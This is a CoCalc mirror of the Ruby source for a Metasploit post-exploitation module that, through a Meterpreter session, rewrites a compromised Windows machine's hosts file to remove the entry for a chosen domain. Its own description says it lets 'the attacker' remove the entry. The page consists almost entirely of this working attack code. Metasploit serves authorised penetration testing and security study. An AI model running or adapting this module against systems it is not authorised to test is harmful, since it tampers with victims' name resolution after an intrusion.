CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/remove_host.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Manage Host File Entry Removal',12'Description' => %q{13This module allows the attacker to remove an entry from the Windows hosts file.14},15'License' => BSD_LICENSE,16'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],17'Platform' => [ 'win' ],18'SessionTypes' => [ 'meterpreter' ],19'Compat' => {20'Meterpreter' => {21'Commands' => %w[22core_channel_close23core_channel_eof24core_channel_open25core_channel_read26core_channel_tell27core_channel_write28]29}30}31)32)3334register_options(35[36OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])37]38)39end4041def run42hosttoremove = datastore['DOMAIN']43# remove hostname from hosts file44fd = client.fs.file.new('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', 'r+b')4546# Get a temporary file path47meterp_temp = Tempfile.new('meterp')48meterp_temp.binmode49temp_path = meterp_temp.path5051print_status("Removing hosts file entry pointing to #{hosttoremove}")5253newfile = ''54fdray = fd.read.split("\r\n")5556fdray.each do |line|57unless line.match("\t#{hosttoremove}$")58newfile += "#{line}\r\n"59end60end6162fd.close6364meterp_temp.write(newfile)65meterp_temp.close6667client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', meterp_temp)68print_good('Done!')69end70end717273